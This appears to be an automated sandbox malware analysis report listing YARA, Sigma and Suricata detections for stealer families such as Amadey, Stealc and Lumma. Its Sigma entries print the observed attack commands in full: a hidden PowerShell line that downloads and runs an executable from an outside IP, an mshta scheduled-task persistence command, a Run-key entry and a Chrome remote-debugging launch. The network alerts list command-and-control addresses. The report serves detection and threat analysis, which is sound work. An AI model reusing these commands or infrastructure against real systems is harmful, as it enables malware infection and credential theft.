00000018.00000003.2416653360.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000003.2407121284.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.2527946082.00000000000E1000.00000040.00000001.01000000.00000009.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001A.00000002.2715346426.0000000000541000.00000040.00000001.01000000.00000013.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000018.00000003.2393277483.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000003.2177798634.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
00000000.00000003.1419539913.0000000005240000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Process Memory Space: 0f39a8c7db.exe PID: 3340	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 0f39a8c7db.exe PID: 3340	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 0f39a8c7db.exe PID: 3340	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 0f39a8c7db.exe PID: 3340	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 0f39a8c7db.exe PID: 6304	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 0f39a8c7db.exe PID: 6304	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 382cd038a3.exe PID: 5600	JoeSecurity_Cryptbot_1	Yara detected Cryptbot	Joe Security
Process Memory Space: eb74aeb58b.exe PID: 2340	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: eb74aeb58b.exe PID: 2340	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: eb74aeb58b.exe PID: 2340	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 1f1ada1ce1.exe PID: 7256	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 1f1ada1ce1.exe PID: 7256	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 0f39a8c7db.exe PID: 7452	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 0f39a8c7db.exe PID: 7452	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 8f4d1353d2.exe PID: 7728	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 8f4d1353d2.exe PID: 7728	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: a103019032.exe PID: 7480	JoeSecurity_CredentialFlusher	Yara detected Credential Flusher	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 90 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.0xqfQZufeQ.exe.a60000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
13.2.3f28c42ac4.exe.400000.0.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
13.2.3f28c42ac4.exe.4b40e67.1.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
13.2.3f28c42ac4.exe.400000.0.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
13.3.3f28c42ac4.exe.4cf0000.0.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
6.2.axplong.exe.d30000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.axplong.exe.d30000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
14.2.skotes.exe.60000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
9.2.8166ff9922.exe.3b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
28.2.8166ff9922.exe.3b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
22.2.8166ff9922.exe.3b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 6 entries

Other

Source	Rule	Description	Author	Strings
amsi32_3364.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi64_3820.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn qyqYHmavVr6 /tr "mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn qyqYHmavVr6 /tr "mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe, ParentProcessId: 4132, ParentProcessName: 0c43e4c1fb.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn qyqYHmavVr6 /tr "mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 5708, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ProcessId: 8152, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0f39a8c7db.exe

Sigma detected: PowerShell DownloadFile

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7848, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 3364, ProcessName: powershell.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe, ParentProcessId: 4132, ParentProcessName: 0c43e4c1fb.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta, ProcessId: 7848, ProcessName: mshta.exe

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7848, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 3364, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe, ParentProcessId: 4132, ParentProcessName: 0c43e4c1fb.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta, ProcessId: 7848, ProcessName: mshta.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe, ParentProcessId: 3340, ParentProcessName: 0f39a8c7db.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 5760, ProcessName: chrome.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ProcessId: 8152, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0f39a8c7db.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3364, TargetFilename: C:\Users\user\AppData\Local\TempGZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE

Sigma detected: PowerShell Download Pattern

Source: Process started

Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7848, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 3364, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn qyqYHmavVr6 /tr "mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: schtasks /create /tn qyqYHmavVr6 /tr "mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn qyqYHmavVr6 /tr "mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta" /sc minute /mo 25 /ru "user" /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5708, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn qyqYHmavVr6 /tr "mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 7936, ProcessName: schtasks.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7848, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 3364, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7848, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 3364, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Powershell download and execute file

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7848, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GZNYHYYDLQECVDTUHJNUMDPIB4RIHGE8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 3364, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:35.027521+0100	2028371	3	Unknown Traffic	192.168.2.8	49762	104.21.79.9	443	TCP
2025-02-01T17:18:35.994872+0100	2028371	3	Unknown Traffic	192.168.2.8	49765	104.21.79.9	443	TCP
2025-02-01T17:18:36.829173+0100	2028371	3	Unknown Traffic	192.168.2.8	49768	104.21.18.116	443	TCP
2025-02-01T17:18:38.237776+0100	2028371	3	Unknown Traffic	192.168.2.8	49772	104.21.18.116	443	TCP
2025-02-01T17:18:38.268771+0100	2028371	3	Unknown Traffic	192.168.2.8	49773	104.21.79.9	443	TCP
2025-02-01T17:18:40.686503+0100	2028371	3	Unknown Traffic	192.168.2.8	49777	104.21.79.9	443	TCP
2025-02-01T17:18:40.792057+0100	2028371	3	Unknown Traffic	192.168.2.8	49778	104.21.18.116	443	TCP
2025-02-01T17:18:42.238321+0100	2028371	3	Unknown Traffic	192.168.2.8	49781	104.21.79.9	443	TCP
2025-02-01T17:18:42.320115+0100	2028371	3	Unknown Traffic	192.168.2.8	49782	104.21.18.116	443	TCP
2025-02-01T17:18:44.201257+0100	2028371	3	Unknown Traffic	192.168.2.8	49786	104.21.18.116	443	TCP
2025-02-01T17:18:44.204432+0100	2028371	3	Unknown Traffic	192.168.2.8	49787	104.21.79.9	443	TCP
2025-02-01T17:18:46.831018+0100	2028371	3	Unknown Traffic	192.168.2.8	49790	104.21.79.9	443	TCP
2025-02-01T17:18:48.561577+0100	2028371	3	Unknown Traffic	192.168.2.8	49795	104.21.18.116	443	TCP
2025-02-01T17:18:49.826612+0100	2028371	3	Unknown Traffic	192.168.2.8	49797	104.21.79.9	443	TCP
2025-02-01T17:18:53.306874+0100	2028371	3	Unknown Traffic	192.168.2.8	49803	104.21.18.116	443	TCP
2025-02-01T17:18:56.315554+0100	2028371	3	Unknown Traffic	192.168.2.8	49810	104.21.18.116	443	TCP
2025-02-01T17:19:00.887331+0100	2028371	3	Unknown Traffic	192.168.2.8	49821	104.21.18.116	443	TCP
2025-02-01T17:19:02.075805+0100	2028371	3	Unknown Traffic	192.168.2.8	49823	104.21.18.116	443	TCP
2025-02-01T17:19:10.186268+0100	2028371	3	Unknown Traffic	192.168.2.8	49841	104.21.18.116	443	TCP
2025-02-01T17:19:14.318686+0100	2028371	3	Unknown Traffic	192.168.2.8	49846	104.21.18.116	443	TCP
2025-02-01T17:19:15.581553+0100	2028371	3	Unknown Traffic	192.168.2.8	49848	104.21.18.116	443	TCP
2025-02-01T17:19:18.265739+0100	2028371	3	Unknown Traffic	192.168.2.8	49856	104.21.18.116	443	TCP
2025-02-01T17:19:19.818999+0100	2028371	3	Unknown Traffic	192.168.2.8	49859	104.21.18.116	443	TCP
2025-02-01T17:19:21.037822+0100	2028371	3	Unknown Traffic	192.168.2.8	49869	104.21.18.116	443	TCP
2025-02-01T17:19:22.402089+0100	2028371	3	Unknown Traffic	192.168.2.8	49871	104.21.18.116	443	TCP
2025-02-01T17:19:33.215445+0100	2028371	3	Unknown Traffic	192.168.2.8	49906	104.21.18.116	443	TCP
2025-02-01T17:19:35.008641+0100	2028371	3	Unknown Traffic	192.168.2.8	49908	104.21.18.116	443	TCP
2025-02-01T17:19:47.422500+0100	2028371	3	Unknown Traffic	192.168.2.8	49945	104.21.18.116	443	TCP
2025-02-01T17:19:49.377525+0100	2028371	3	Unknown Traffic	192.168.2.8	49957	104.21.18.116	443	TCP

ET MALWARE CryptBot CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:30.800398+0100	2059018	1	A Network Trojan was detected	192.168.2.8	49754	94.156.102.239	80	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:35.513614+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49762	104.21.79.9	443	TCP
2025-02-01T17:18:36.533547+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49765	104.21.79.9	443	TCP
2025-02-01T17:18:37.755188+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49768	104.21.18.116	443	TCP
2025-02-01T17:18:38.728379+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49772	104.21.18.116	443	TCP
2025-02-01T17:18:50.320869+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49797	104.21.79.9	443	TCP
2025-02-01T17:18:56.810675+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49810	104.21.18.116	443	TCP
2025-02-01T17:19:01.389176+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49821	104.21.18.116	443	TCP
2025-02-01T17:19:02.894365+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49823	104.21.18.116	443	TCP
2025-02-01T17:19:14.806967+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49846	104.21.18.116	443	TCP
2025-02-01T17:19:16.123536+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49848	104.21.18.116	443	TCP
2025-02-01T17:19:35.522041+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49908	104.21.18.116	443	TCP
2025-02-01T17:19:47.821139+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49945	104.21.18.116	443	TCP
2025-02-01T17:19:49.925942+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49957	104.21.18.116	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:35.513614+0100	2049836	1	A Network Trojan was detected	192.168.2.8	49762	104.21.79.9	443	TCP
2025-02-01T17:18:37.755188+0100	2049836	1	A Network Trojan was detected	192.168.2.8	49768	104.21.18.116	443	TCP
2025-02-01T17:19:01.389176+0100	2049836	1	A Network Trojan was detected	192.168.2.8	49821	104.21.18.116	443	TCP
2025-02-01T17:19:14.806967+0100	2049836	1	A Network Trojan was detected	192.168.2.8	49846	104.21.18.116	443	TCP
2025-02-01T17:19:47.821139+0100	2049836	1	A Network Trojan was detected	192.168.2.8	49945	104.21.18.116	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:36.533547+0100	2049812	1	A Network Trojan was detected	192.168.2.8	49765	104.21.79.9	443	TCP
2025-02-01T17:18:38.728379+0100	2049812	1	A Network Trojan was detected	192.168.2.8	49772	104.21.18.116	443	TCP
2025-02-01T17:19:02.894365+0100	2049812	1	A Network Trojan was detected	192.168.2.8	49823	104.21.18.116	443	TCP
2025-02-01T17:19:16.123536+0100	2049812	1	A Network Trojan was detected	192.168.2.8	49848	104.21.18.116	443	TCP
2025-02-01T17:19:49.925942+0100	2049812	1	A Network Trojan was detected	192.168.2.8	49957	104.21.18.116	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:35.027521+0100	2059150	1	Domain Observed Used for C2 Detected	192.168.2.8	49762	104.21.79.9	443	TCP
2025-02-01T17:18:35.994872+0100	2059150	1	Domain Observed Used for C2 Detected	192.168.2.8	49765	104.21.79.9	443	TCP
2025-02-01T17:18:38.268771+0100	2059150	1	Domain Observed Used for C2 Detected	192.168.2.8	49773	104.21.79.9	443	TCP
2025-02-01T17:18:40.686503+0100	2059150	1	Domain Observed Used for C2 Detected	192.168.2.8	49777	104.21.79.9	443	TCP
2025-02-01T17:18:42.238321+0100	2059150	1	Domain Observed Used for C2 Detected	192.168.2.8	49781	104.21.79.9	443	TCP
2025-02-01T17:18:44.204432+0100	2059150	1	Domain Observed Used for C2 Detected	192.168.2.8	49787	104.21.79.9	443	TCP
2025-02-01T17:18:46.831018+0100	2059150	1	Domain Observed Used for C2 Detected	192.168.2.8	49790	104.21.79.9	443	TCP
2025-02-01T17:18:49.826612+0100	2059150	1	Domain Observed Used for C2 Detected	192.168.2.8	49797	104.21.79.9	443	TCP

ET MALWARE RedLine Stealer - CheckConnect Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:19:04.631067+0100	2045000	1	Malware Command and Control Activity Detected	103.84.89.222	33791	192.168.2.8	49818	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:07.906863+0100	2044696	1	A Network Trojan was detected	192.168.2.8	49710	185.215.113.16	80	TCP
2025-02-01T17:18:12.154445+0100	2044696	1	A Network Trojan was detected	192.168.2.8	49712	185.215.113.16	80	TCP
